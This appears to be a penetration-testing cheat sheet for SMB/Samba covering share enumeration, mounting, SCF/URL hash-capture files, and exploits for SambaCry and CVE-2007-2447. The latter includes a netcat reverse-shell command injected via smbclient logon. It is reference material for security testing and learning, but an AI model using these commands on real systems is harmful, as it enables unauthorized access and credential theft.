SMB

Port : 445,139

Reference

Guide: https://www.hackingarticles.in/smb-penetration-testing-port-445/

Troubleshooting

#Protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
#Add to 'global' section in /etc/samba/smb.conf
client min protocol = LANMAN1

  • Nmap Scripts

    • smb-os-discovery.nse [OS Detection]

    • smb-vuln [Checks for windows remote vuln]

    • smb-vuln-ms17-010 [Checks if SMBv1 server is vulnerable]

Enumerating Shares

enum4linux -a <IP>
python3 nullinux.py -u "username" -p "password" -q

#List Shares
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbmap -H <IP> -u username -p password

crackmapexec smb -u notarealuser -p '' --shares <IP>

#Deprecated protocols
smbclient -L \\\\10.10.10.3\\ --option='client min protocol=NT1'

#Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes'
#In the /etc/samba/smb.conf file to be able to connect to those old servers.
client lanman auth = yes
client ntlmv2 auth = no

#List contents of share
smbmap -R Share_name -H 10.10.10.100
smbclient \\10.10.10.102\Sharename
#-k to use cached kerberos TGT
smbclient -k -L //<IP.local>

#Download shares [-q :Quiet mode]
smbmap -R Share_name -H 10.10.10.100 -A Filename -q -u notarealusername
smbclient //10.10.10.100/Share_name -U ""%"" -c 'prompt OFF;recurse ON; mget *' 
get file.txt

#Logging into SMB Share [-N :suppresses password prompt]
smbclient \\\\10.10.10.100\\Share_name -U "Username"%"Password"
smbclient -N \\\\10.10.10.123\\Share_name

#impacket
smbclient.py <Domain>/<Username>:<Password>@<IP-Address>

  • In case of Error:[!]Authentication error on<IP>.

smbmap -H 10.10.10.3 -u notausername 
#Try this
pip3 install --upgrade impacket

Version Enumeration

Ref: https://raw.githubusercontent.com/amitn322/smb-version/master/samba_version.py

sudo python samba_version.py -s <IP>

Manually Identify Version

  • Run wireshark and start sniffing

  • Run: smbclient -L <\\IP>

  • Stop sniffing and find packet:

  • protocol: SMB Info: Sessions Setup And Response

RestrictAnonymous Bypass

  • Username enumeration via SID walk

https://vidstromlabs.com/freetools/dumpusers/

Mounting Shares

NFS (Network File System) is a popular distributed file system. NFS shares are configured in the /etc/exports file. Remote users can mount shares, access, create, modify files. By default, created files inherit the remote user’s id and group id (as owner and group respectively), even if they don’t exist on the NFS server.

#Check for mountable shares
showmount -e 10.10.10.53

#Lists current mounted directories
df -k

ls /mnt
mount -t cifs -o username=notarealname,password=<Empty-for-null-login> //10.10.10.100/Sharename /mnt/local_dir_name

#Mount NFS Shares
sudo mkdir /tmp/tmpdir
sudo mount -t nfs 10.10.10.53:/Sharename 
mount -t nfs [-o vers=2] <ip>:<remote_folder> /tmp/tmpdir -o nolock
#Unmount
sudo umount -a -t cifs

#Script for checking if share is writable
#writable.sh
list=$(find /mnt -type d)
for d in $list
do
  touch $d/x 2>/dev/null
  if [ $? -eq 0 ]
  then
    echo $d "is writable"
  fi
done

Mounting VHD Shares

//Mount the share
mount -t cifs -o 'rw,username=guest' //10.10.10.134/Backups localdirectory_name
//Mount the vhd file within this share
guestmount -a /mnt/remote/path/to/vhdfile.vhd -m /dev/sda1 --ro /root/bastion

  • Tip: Look for SAM, Security System files in C:\Windows\System32\config

Write-Access Attack

SCF and URL file attack against writeable share

Drop the following @something.scf/something.scf file inside a share and start listening with Responder :

  • responder -wrf --lm -v -I eth0 (may not work all the time, try both commands)

  • responder -I tun0

[Shell]
Command=2
IconFile=\\<IP>\Share\test.ico
[Taskbar]
Command=ToggleDesktop

This attack also works with .url files

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<IP>\%USERNAME%.icon
IconIndex=1

Setting up a Samba Server

sudo smbserver.py -smb2support Data $(pwd)

----
chmod +x /path/toshare/

#/etc/samba/smb.conf
[myshare]
path = /path/to/share
writeable = yes
browseable = yes
public = yes

service smbd restart

net use k: \\10.10.14.22\myshare

#To reset
net user k: /delete

#Create an NTFS disk.(2GB)
dd if=/dev/zero of=ntfs.disk bs=1024M count=2
losetup -h
sudo losetup -fP ntfs.disk
losetup -a
sudo mkfs.ntfs /dev/loop0
sudo mount /dev/loop0 /directory/to/mount
mount | grep /directory/to/mount

SambaCry CVE-2017-7494 [RCE]

Reference

  • sensorstechforum

  • Exploitation

  • Remote code execution from a writable share.

  • Versions affected: All versions of Samba from 3.5.0 onwards.

  • Description: Malicious clients can upload and cause the smbd server to execute a shared library from a writable share.

Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.

Exploitation

  • Clone the Github Repo


#include <stdio.h>
#include <stdlib.h>

static void smash() __attribute__((constructor));
Samba 3.0.24

void smash() {
setresuid(0,0,0);
system("<put a bash command here>");
}

then compile with
gcc -o <outfile.so> -shared <infile.c> -fPIC

CVE-2007-2447

  • Version : smbd 3.0.20-Debian [With Anonymous Login]

  • CVE-2007–2447

    • -logon : changing users once connected

#Set up listener on Attacker's System
smbclient //victim_IP/tmp --option='client min protocol=NT1'

logon "/=`nohup nc -nv 192.168.119.174 4444 -e /bin/sh`"

Samba Simulink Directory Traversal

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

searchsploit -m 10
gcc exploit.c -o exploit
./exploit -b 0 -v <IP>
PreviousSSHNextContent Management Systems

Last updated